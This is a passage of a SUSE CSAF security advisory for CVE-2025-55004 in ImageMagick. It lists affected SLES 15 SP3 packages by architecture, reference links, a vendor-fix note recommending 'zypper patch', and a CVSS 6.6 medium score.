"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55004",
"url": "https://www.suse.com/security/cve/CVE-2025-55004"
},
{
"category": "external",
"summary": "SUSE Bug 1248076 for CVE-2025-55004",
"url": "https://bugzilla.suse.com/1248076"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
